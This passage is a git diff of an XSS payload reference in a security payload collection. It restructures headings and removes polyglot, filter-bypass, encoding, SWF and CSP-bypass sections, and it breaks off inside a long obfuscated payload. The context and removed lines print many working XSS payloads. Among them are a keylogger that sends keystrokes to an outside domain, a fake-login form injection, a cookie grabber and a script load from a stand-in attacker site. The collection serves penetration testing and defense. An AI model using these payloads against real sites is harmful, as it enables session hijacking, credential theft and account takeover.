[XSS in SVG (short)](#xss-in-svg-short) - [XSS in Markdown](#xss-in-markdown) - - [XSS in SWF flash application](#xss-in-swf-flash-application) - - [XSS in SWF flash application](#xss-in-swf-flash-application-1) - [XSS in CSS](#xss-in-css) - [XSS in PostMessage](#xss-in-postmessage) - [Blind XSS](#blind-xss) @@ -37,53 +38,6 @@ - [Blind XSS endpoint](#blind-xss-endpoint) - [Tips](#tips) - [Mutated XSS](#mutated-xss) -- [Polyglot XSS](#polyglot-xss) -- [Filter Bypass and exotic payloads](#filter-bypass-and-exotic-payloads) - - [Bypass case sensitive](#bypass-case-sensitive) - - [Bypass tag blacklist](#bypass-tag-blacklist) - - [Bypass word blacklist with code evaluation](#bypass-word-blacklist-with-code-evaluation) - - [Bypass with incomplete html tag](#bypass-with-incomplete-html-tag) - - [Bypass quotes for string](#bypass-quotes-for-string) - - [Bypass quotes in script tag](#bypass-quotes-in-script-tag) - - [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event) - - [Bypass dot filter](#bypass-dot-filter) - - [Bypass parenthesis for string](#bypass-parenthesis-for-string) - - [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon) - - [Bypass onxxxx= blacklist](#bypass-onxxxx-blacklist) - - [Bypass space filter](#bypass-space-filter) - - [Bypass email filter](#bypass-email-filter) - - [Bypass document blacklist](#bypass-document-blacklist) - - [Bypass document.cookie blacklist](#bypass-document-cookie-blacklist) - - [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string) - - [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect) - - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert) - - [Bypass ">" using nothing](#bypass--using-nothing) - - [Bypass "<" and ">" using < and >](#bypass--and--using--and-) - - [Bypass ";" using another character](#bypass--using-another-character) - - [Bypass using missing charset header](#bypass-using-missing-charset-header) - - [Bypass using HTML encoding](#bypass-using-html-encoding) - - [Bypass using Katakana](#bypass-using-katakana) - - [Bypass using Cuneiform](#bypass-using-cuneiform) - - [Bypass using Lontara](#bypass-using-lontara) - - [Bypass using ECMAScript6](#bypass-using-ecmascript6) - - [Bypass using Octal encoding](#bypass-using-octal-encoding) - - [Bypass using Unicode](#bypass-using-unicode) - - [Bypass using UTF-7](#bypass-using-utf-7) - - [Bypass using UTF-8](#bypass-using-utf-8) - - [Bypass using UTF-16be](#bypass-using-utf-16be) - - [Bypass using UTF-32](#bypass-using-utf-32) - - [Bypass using BOM](#bypass-using-bom) - - [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation) - - [Bypass using jsfuck](#bypass-using-jsfuck) -- [CSP Bypass](#csp-bypass) - - [Bypass CSP using JSONP](#bypass-csp-using-jsonp) - - [Bypass CSP default-src](#bypass-csp-default-src) - - [Bypass CSP inline eval](#bypass-csp-inline-eval) - - [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline) - - [Bypass CSP script-src self](#bypass-csp-script-src-self) - - [Bypass CSP script-src data](#bypass-csp-script-src-data) - - [Bypass CSP nonce](#bypass-csp-nonce) - - [Bypass CSP header sent by PHP](#bypass-csp-header-sent-by-php) - [References](#references) @@ -102,9 +56,12 @@ There are 3 main types of XSS attacks: To prevent XSS attacks, it is important to properly validate and sanitize user input. This means ensuring that all input meets the necessary criteria, and removing any potentially dangerous characters or code. It is also important to escape special characters in user input before rendering it in the browser, to prevent the browser from interpreting it as code. -## Exploit code or POC +## Proof of Concept -### Data grabber for XSS +When exploiting an XSS vulnerability, it’s more effective to demonstrate a complete exploitation scenario that could lead to account takeover or sensitive data exfiltration. Instead of simply reporting an XSS with an alert payload, aim to capture valuable data, such as payment information, personal identifiable information (PII), session cookies, or credentials. + + +### Data Grabber Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page. @@ -138,7 +95,7 @@ fclose($fp); </script> ``` -### UI redressing +### UI Redressing Leverage the XSS to modify the HTML content of the page in order to display a fake login form. @@ -149,7 +106,7 @@ document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue </script> ``` -### Javascript keylogger +### Javascript Keylogger Another way to collect sensitive data is to set a javascript keylogger. @@ -157,7 +114,7 @@ Another way to collect sensitive data is to set a javascript keylogger. <img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'> ``` -### Other ways +### Other Ways More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all](http://www.xss-payloads.com/payloads-list.html?a#category=all): @@ -168,6 +125,7 @@ More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all] - [Redirect Form](http://www.xss-payloads.com/payloads/scripts/redirectform.js.html) - [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html) + ## Identify an XSS endpoint This payload opens the debugger in the developer console rather than triggering a popup alert box. @@ -324,9 +282,9 @@ Based on a DOM XSS sink. // (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic) ``` -## XSS in wrappers javascript and data URI +## XSS in Wrappers for URI -XSS with javascript: +### Wrapper javascript ```javascript javascript:prompt(1) @@ -353,7 +311,7 @@ javascript://%0Aalert(1) javascript://anything%0D%0A%0D%0Awindow.alert(1) ``` -XSS with data: +### Wrapper data ```javascript data:text/html,<script>alert(0)</script> @@ -361,7 +319,9 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> ``` -XSS with vbscript: only IE +### Wrapper vbscript + +only IE ```javascript vbscript:msgbox("XSS") @@ -483,37 +443,6 @@ However, including svg tags in SVG documents works and allows XSS execution from [a](javascript:window.onerror=alert;throw%201) ``` -### XSS in SWF flash application - -```powershell -Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); -IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} -IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); -``` - -more payloads in ./files - -### XSS in SWF flash application - -``` -flashmediaelement.swf?jsinitfunctio%gn=alert`1` -flashmediaelement.swf?jsinitfunctio%25gn=alert(1) -ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 -swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);// -swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf -plupload.flash.swf?%#target%g=alert&uid%g=XSS& -moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true -video-js.swf?readyFunction=alert(1) -player.swf?playerready=alert(document.cookie) -player.swf?tracecall=alert(document.cookie) -banner.swf?clickTAG=javascript:alert(1);// -io.swf?yid=\"));}catch(e){alert(1);}// -video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29 -bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 -flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// -phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}// -``` - ### XSS in CSS ```html @@ -623,744 +552,6 @@ Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Sea <noscript><p title="</noscript><img src=x onerror=alert(1)>"> ``` -## Polyglot XSS - -Polyglot XSS - 0xsobky - -```javascript -jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e -``` - -Polyglot XSS - Ashar Javed - -```javascript -">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> -``` - -Polyglot XSS - Mathias Karlsson - -```javascript -" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// -``` - -Polyglot XSS - Rsnake - -```javascript -';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> -``` - -Polyglot XSS - Daniel Miessler - -```javascript -';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> -“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// -'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> -javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* -javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a -javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ -javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* -javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* -javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// -javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* ---></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* -/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* -javascript://--></title></style></textarea></script><svg "//' onclick=alert()// -/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* -``` - -Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514) -![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg) - -```javascript --->'"/></sCript><svG x=">" onload=(co\u006efirm)``> -``` - -![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large) - -```javascript -<svg%0Ao%00nload=%09((pro\u006dpt))()// -``` - -Polyglot XSS - from [@filedescriptor's Polyglot Challenge](http://polyglot.innerht.ml) - -```javascript -# by crlf -javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//> - -# by europa -javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//> - -# by EdOverflow -javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//> - -# by h1/ragnar -javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>` -``` - -Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/) -```javascript -JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76--> -``` - -## Filter Bypass and exotic payloads - -### Bypass case sensitive - -```javascript -<sCrIpt>alert(1)</ScRipt> -``` - -### Bypass tag blacklist - -```javascript -<script x> -<script x>alert('XSS')<script y> -``` - -### Bypass word blacklist with code evaluation - -```javascript -eval('ale'+'rt(0)'); -Function("ale"+"rt(1)")(); -new Function`al\ert\`6\``; -setTimeout('ale'+'rt(2)'); -setInterval('ale'+'rt(10)'); -Set.constructor('ale'+'rt(13)')(); -Set.constructor`al\x65rt\x2814\x29```; -``` - -### Bypass with incomplete html tag - -Works on IE/Firefox/Chrome/Safari - -```javascript -<img src='1' onerror='alert(0)' < -``` - -### Bypass quotes for string - -```javascript -String.fromCharCode(88,83,83) -``` - -### Bypass quotes in script tag - -```javascript -http://localhost/bla.php?test=</script><script>alert(1)</script> -<html> - <script> - <?php echo 'foo="text '.$_GET['test'].'";';`?> - </script> -</html> -``` - -### Bypass quotes in mousedown event - -You can bypass a single quote with &#39; in an on mousedown event handler - -```javascript -<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a> -``` - -### Bypass dot filter - -```javascript -<script>window['alert'](document['domain'])</script> -``` - -Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777` -http://www.geektools.com/cgi-bin/ipconv.cgi - -```javascript -<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script> -``` - -Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==` - -### Bypass parenthesis for string - -```javascript -alert`1` -setTimeout`alert\u0028document.domain\u0029`; -``` - -### Bypass parenthesis and semi colon - -```javascript -// From @garethheyes -<script>onerror=alert;throw 1337</script> -<script>{onerror=alert}throw 1337</script> -<script>throw onerror=alert,'some string',123,'haha'</script> - -// From @terjanq -<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script> - -// From @cgvwzq -<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script> -``` - -### Bypass onxxxx= blacklist - -```javascript -<object onafterscriptexecute=confirm(0)> -<object onbeforescriptexecute=confirm(0)> - -// Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed -<img src='1' onerror\x00=alert(0) /> -<img src='1' onerror\x0b=alert(0) /> -<img src='1' onerror\x0d=alert(0) /> -<img src='1' onerror\x0a=alert(0) /> - -// Bypass onxxx= filter with a '/' -<img src='1' onerror/=alert(0) /> -``` - -### Bypass space filter - -```javascript -// Bypass space filter with "/" -<img/src='1'/onerror=alert(0)> - -// Bypass space filter with 0x0c/^L or 0x0d/^M or 0x0a/^J or 0x09/^I -<svg onload = alert(1) > - -$ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd -00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <svg.onload.=.al -00000010: 6572 7428 3129 0c3e 0a ert(1).>. -``` - - -### Bypass email filter - -* [RFC0822 compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate) - ```javascript - "><svg/onload=confirm(1)>"@x.y - ``` - -* [RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/) - ```javascript - xss@example.com(<img src='x' onerror='alert(document.location)'>) - ``` - - -### Bypass tel URI filter - -At least 2 RFC mention the `;phone-context=` descriptor: - -* [RFC3966 - The tel URI for Telephone Numbers](https://www.ietf.org/rfc/rfc3966.txt) -* [RFC2806 - URLs for Telephone Calls](https://www.ietf.org/rfc/rfc2806.txt) - -```javascript -+330011223344;phone-context=<script>alert(0)</script> -``` - - -### Bypass document blacklist - -```javascript -<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script> -window["doc"+"ument"] -``` - -### Bypass document.cookie blacklist - -This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements. - -``` -window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);}); -``` - -### Bypass using javascript inside a string - -```javascript -<script> -foo="text </script><script>alert(1)</script>"; -</script> -``` - -### Bypass using an alternate way to redirect - -```javascript -location="http://google.com" -document.location = "http://google.com" -document.location.href="http://google.com" -window.location.assign("http://google.com") -window['location']['href']="http://google.com" -``` - -### Bypass using an alternate way to execute an alert - -From [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) tweet. - -```javascript -window['alert'](0) -parent['alert'](1) -self['alert'](2) -top['alert'](3) -this['alert'](4) -frames['alert'](5) -content['alert'](6) - -[7].map(alert) -[8].find(alert) -[9].every(alert) -[10].filter(alert) -[11].findIndex(alert) -[12].forEach(alert); -``` - -From [@theMiddle](https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/) - Using global variables - -The Object.keys() method returns an array of a given object's own property names, in the same order as we get with a normal loop. That's means that we can access any JavaScript function by using its **index number instead the function name**. - -```javascript -c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; } -// 5 -``` - -Then calling alert is : - -```javascript -Object.keys(self)[5] -// "alert" -self[Object.keys(self)[5]]("1") // alert("1") -``` - -We can find "alert" with a regular expression like ^a[rel]+t$ : - -```javascript -a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a() - -// then you can use a() with Object.keys - -self[Object.keys(self)[a()]]("1") // alert("1") -``` - -Oneliner: -```javascript -a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1") -``` - -From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet. - -```javascript -prompt`${document.domain}` -document.location='java\tscript:alert(1)' -document.location='java\rscript:alert(1)' -document.location='java\tscript:alert(1)' -``` - -From [@404death](https://twitter.com/404death/status/1011860096685502464) tweet. - -```javascript -eval('ale'+'rt(0)'); -Function("ale"+"rt(1)")(); -new Function`al\ert\`6\``; - -constructor.constructor("aler"+"t(3)")(); -[].filter.constructor('ale'+'rt(4)')(); - -top["al"+"ert"](5); -top[8680439..toString(30)](7); -top[/al/.source+/ert/.source](8); -top['al\x65rt'](9); - -open('java'+'script:ale'+'rt(11)'); -location='javascript:ale'+'rt(12)'; - -setTimeout`alert\u0028document.domain\u0029`; -setTimeout('ale'+'rt(2)'); -setInterval('ale'+'rt(10)'); -Set.constructor('ale'+'rt(13)')(); -Set.constructor`al\x65rt\x2814\x29```; -``` - -Bypass using an alternate way to trigger an alert - -```javascript -var i = document.createElement("iframe"); -i.onload = function(){ - i.contentWindow.alert(1); -} -document.appendChild(i); - -// Bypassed security -XSSObject.proxy = function (obj, name, report_function_name, exec_original) { - var proxy = obj[name]; - obj[name] = function () { - if (exec_original) { - return proxy.apply(this, arguments); - } - }; - XSSObject.lockdown(obj, name); - }; -XSSObject.proxy(window, 'alert', 'window.alert', false); -``` - -### Bypass ">" using nothing - -You don't need to close your tags. - -```javascript -<svg onload=alert(1)// -``` - -### Bypass "<" and ">" using < and > - -Unicode Character U+FF1C and U+FF1E - -```javascript -<script/src=//evil.site/poc.js> -``` - -### Bypass ";" using another character - -```javascript -'te' * alert('*') * 'xt'; -'te' / alert('/') / 'xt'; -'te' % alert('%') % 'xt'; -'te' - alert('-') - 'xt'; -'te' + alert('+') + 'xt'; -'te' ^ alert('^') ^ 'xt'; -'te' > alert('>') > 'xt'; -'te' < alert('<') < 'xt'; -'te' == alert('==') == 'xt'; -'te' & alert('&') & 'xt'; -'te' , alert(',') , 'xt'; -'te' | alert('|') | 'xt'; -'te' ? alert('ifelsesh') : 'xt'; -'te' in alert('in') in 'xt'; -'te' instanceof alert('instanceof') instanceof 'xt'; -``` - - -### Bypass using missing charset header - -**Requirements**: - -* Server header missing `charset`: `Content-Type: text/html` - -#### ISO-2022-JP - -ISO-2022-JP uses escape characters to switch between several character sets. - -| Escape | Encoding | -|-----------|-----------------| -| `\x1B (B` | ASCII | -| `\x1B (J` | JIS X 0201 1976 | -| `\x1B $@` | JIS X 0208 1978 | -| `\x1B $B` | JIS X 0208 1983 | - - -Using the [code table](https://en.wikipedia.org/wiki/JIS_X_0201#Codepage_layout), we can find multiple characters that will be transformed when switching from **ASCII** to **JIS X 0201 1976**. - -| Hex | ASCII | JIS X 0201 1976 | -| ---- | --- | --- | -| 0x5c | `\` | `¥` | -| 0x7e | `~` | `‾` | - - -**Example** - -Use `%1b(J` to force convert a `\'` (ascii) in to `¥'` (JIS X 0201 1976), unescaping the quote. - -Payload: `search=%1b(J&lang=en";alert(1)//` - - -### Bypass using HTML encoding - -```javascript -%26%2397;lert(1) -&#97;&#108;&#101;&#114;&#116; -></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)> -``` - -### Bypass using Katakana - -Using the [Katakana](https://github.com/aemkei/katakana.js) library. - -```javascript -javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() -``` - -### Bypass using Cuneiform - -```javascript -𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], -𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] -+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] -+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() -``` - -### Bypass using Lontara - -```javascript -ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")() -``` - -More alphabets on http://aem1k.com/aurebesh.js/# - -### Bypass using ECMAScript6 - -```html -<script>alert&DiacriticalGrave;1&DiacriticalGrave;</script> -``` - -### Bypass using Octal encoding - -```javascript -javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' -``` - -### Bypass using Unicode - -```javascript -Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was -transformed into U+003C LESS­THAN SIGN (<) - -Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was -transformed into U+0022 QUOTATION MARK (") - -Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was -transformed into U+0027 APOSTROPHE (') - -E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/ -%EF%BC%9E becomes > -%EF%BC%9C becomes < -``` - -Bypass using Unicode converted to uppercase - -```javascript -İ (%c4%b0).toLowerCase() => i -ı (%c4%b1).toUpperCase() => I -ſ (%c5%bf) .toUpperCase() => S -K (%E2%84%AA).toLowerCase() => k - -<ſvg onload=... > become <SVG ONLOAD=...> -<ıframe id=x onload=>.toUpperCase() become <IFRAME ID=X ONLOAD=> -``` - -### Bypass using UTF-7 - -```javascript -+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4- -``` - -### Bypass using UTF-8 - -```javascript -< = %C0%BC = %E0%80%BC = %F0%80%80%BC -> = %C0%BE = %E0%80%BE = %F0%80%80%BE -' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7 -" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2 -" = %CA%BA -' = %CA%B9 -``` - -### Bypass using UTF-16be - -```javascript -%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00 -\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00> -``` - -### Bypass using UTF-32 - -```js -%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E -``` - -### Bypass using BOM - -Byte Order Mark (The page must begin with the BOM character.) -BOM character allows you to override charset of the page - -```js -BOM Character for UTF-16 Encoding: -Big Endian : 0xFE 0xFF -Little Endian : 0xFF 0xFE -XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E - -BOM Character for UTF-32 Encoding: -Big Endian : 0x00 0x00 0xFE 0xFF -Little Endian : 0xFF 0xFE 0x00 0x00 -XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E -``` - -### Bypass using weird encoding or native interpretation - -```javascript -<script>\u0061\u006C\u0065\u0072\u0074(1)</script> -<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" /> -<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe> -<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script> -<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]